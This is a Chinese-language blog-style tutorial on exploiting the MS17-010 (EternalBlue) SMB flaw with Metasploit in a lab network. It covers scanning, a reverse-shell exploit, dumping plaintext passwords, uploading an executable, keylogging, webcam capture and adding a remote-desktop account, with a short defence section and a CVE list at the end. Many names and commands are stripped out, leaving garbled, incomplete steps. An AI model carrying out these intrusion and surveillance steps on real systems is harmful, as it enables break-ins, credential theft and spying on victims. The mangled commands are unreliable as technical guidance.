ifilesmb/漏洞英文bug-零开始渗透详细教程

ifilesmb/漏洞英文bug-零开始渗透详细教程

1、介绍

------是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在和综合报告提出了他们的发现。

------是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布时，计算机安全状况也被永久性地改变了。仿佛一夜之间，任何人都可以成为黑客，每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了，这是因为团队一直都在努力开发各种攻击工具，并将它们贡献给所有用户。(摘录自百度百科)

2、MS17-010漏洞介绍

------MS17-010是一个安全类型的补丁，用来修补操作系统中存在的一个基于SMB服务展现出来的一个漏洞，此漏洞利用445端口执行，原本是作为局域网共享使用的一个端口，但恶意人员可以利用此端口偷偷的执行共享服务或者其他命令执行操作。此MS17-0101漏洞主要是针对于及以前的操作系统暴露出来的安全问题。

3、漏洞利用环境介绍

kali：作为执行漏洞利用的主机，默认上面安装了安全漏洞检测工具，IP为192.168.1.8。

：作为靶机使用，模拟被攻击者，IP为192.168.1.10

：作为靶机使用，模拟被攻击者，IP为192.168.1.15

4、实施过程：

此时发现IP地址已经配置好了：

首先进入平台点击环境申请，进入kali系统发现eth0未启用：

此时网络已经设置好了：

使用ping命令发现网络是通的：

在kali当中启动工具，通过指令进行启动：

命令搜索ms17-010漏洞扫描模块，图中圈中的就是漏洞扫描模块。执行：-010 //搜索ms17-010相关漏洞利用模块

msf > use //smb/（利用模块该扫描模块并且设置相关扫描范围信息）。执行：use //smb/ //选择使用该模块执行搜索选项set 192.168.1.0/24 //设置扫描的网段范围set //设置扫描的线程，数值越大扫描速度越快run //开始运行即开始执行扫描

执行扫描过后，结果如下所示，从结果中可以看到在当前扫描的网段中存在一个和7版本的操作系统存在ms17-010漏洞

接下来进行漏洞利用过程即可，执行：use //smb/ //选择漏洞利用模块set /x64// //设置漏洞利用完成后的反弹模块，用以接收回馈信息set lhost 192.168.1.8//设置反弹IP地址set //设置反弹端口set rhost 192.168.1.15//设置被攻击的目标主机

show //检查设定的信息

//开始进行漏洞利用

到这里即显示漏洞利用已成功。

查看IP地址、查看进程信息。

查看进程信息：

获取密码，执行：load //加载获取密码的模块msv //利用的msv获取密文 //获取明文密码*****

上传文件

在kali根目录下创建了一个aaa.exe的文件，将其上传至目标操作系统当中C盘下。/aaa.exec://

上传之前的C盘：

上传之后：

拓展：

1. -f test.txt //执行该文件，如是木马文件即可成功执行并触发

2.截取目标屏幕快照可以看到图片以及在root目录下面，直接下载查看

3.键盘记录run post/// //运行键盘记录器，用户打开记事本开始写文本，得到结果

4. 调用目标系统摄像头 //查看目标摄像头设备列表 //开启摄像头录像 //开启摄像头拍照 //开启摄像头直播

5、开启目标远程

开启目标远程，并创建一个test帐户：

> run post/// ="test" =""

使用刚才创建的用户和密码进行远程，进行远程控制：

root@kali:~# 192.168.10.105 -u test -p

6、防范措施

关闭445等高危端口

配置防火墙，安装防护软件

安装补丁

7、基础知识介绍

何为永恒之蓝？

永恒之蓝（ Blue）爆发于2017年4月14日晚，是一种利用系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

什么是SMB协议？

SMB（全称是 Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用端口和端口。

SMB工作原理是什么？

（1）：首先客户端发送一个SMB 请求数据报，，并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求，并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回，结束通信。

（2）：协议确定后，客户端进程向服务器发起一个用户或共享的认证，这个过程是通过发送请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器，然后通过服务器发送一个应答数据包来允许或拒绝本次连接。

（3）：当客户端和服务器完成了磋商和认证之后，它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称，之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。

（4）：连接到相应资源后，SMB客户端就能够通过open SMB打开一个文件，通过read SMB读取文件，通过write SMB写入文件，通过close SMB关闭文件。

虽然这个漏洞是比较早期的，但是非常适合新手训练，引领入门；现在很多的服务有的还是搭建在这个系统上，危害性还是比较高，引起重视为好，个人建议如危险常见端口、插件等最好不要暴露出来，再增加WAF、防火墙、入侵检测等防护措施。

列举最近新的漏洞如下：

漏洞名称

CVE编号

跨站脚本漏洞

CVE-2021-27308

安全漏洞

CVE-2018-11747

WLAN 命令注入漏洞

CVE-2019-9161

Nginx安全漏洞

CVE-2018-16844

ZZCMS SQL注入漏洞

CVE-2018-

安全漏洞

CVE-2021-20592

Veyon 安全漏洞

CVE-2020-15261

多款产品安全漏洞

CVE-2021-20738

Linux 安全漏洞

CVE-2021-35039

访问控制错误漏洞

CVE-2021-34626

just-safe-set安全漏洞

CVE-2021-25952

信息泄露漏洞

CVE-2021-0597

跨站请求伪造漏洞

CVE-2021-20782

跨站请求伪造漏洞

CVE-2021-20781

MDT 代码问题漏洞

CVE-2021-32961

安全漏洞

CVE-2021-31816

安全漏洞

CVE-2021-31817

安全漏洞

CVE-2020-20217

安全漏洞

CVE-2020-28598

MDT 加密问题漏洞

CVE-2021-32945

安全特征问题漏洞

CVE-2021-34430

QEMU安全漏洞

CVE-2021-3638

Aruba 安全漏洞

CVE-2021-34614

安全漏洞

CVE-2021-22144

安全漏洞

CVE-2021-24022

Allen 1100输入验证错误漏洞

CVE-2021-33012

安全漏洞

CVE-2021-0592

Cisco Video 7000 IP 安全漏洞

CVE-2021-1598

IBM 跨站脚本漏洞

CVE-2021-29712

信息泄露漏洞

CVE-2021-25432

Tizen安全漏洞

CVE-2021-25433

访问控制错误漏洞

CVE-2021-25431

Tizen代码注入漏洞

CVE-2021-25434

MDT 路径遍历漏洞

CVE-2021-32949

Tizen代码注入漏洞

CVE-2021-25435

Tizen代码注入漏洞

CVE-2021-25436

Tizen代码注入漏洞

CVE-2021-25437

访问控制错误漏洞

CVE-2021-25438

访问控制错误漏洞

CVE-2021-25439

访问控制错误漏洞

CVE-2021-25440

授权问题漏洞

CVE-2021-25430

AR Emoji 输入验证错误漏洞

CVE-2021-25441

IBM 安全漏洞

CVE-2021-29730

KCS安全漏洞

CVE-2021-25442

~

网络安全学习，我们一起交流

~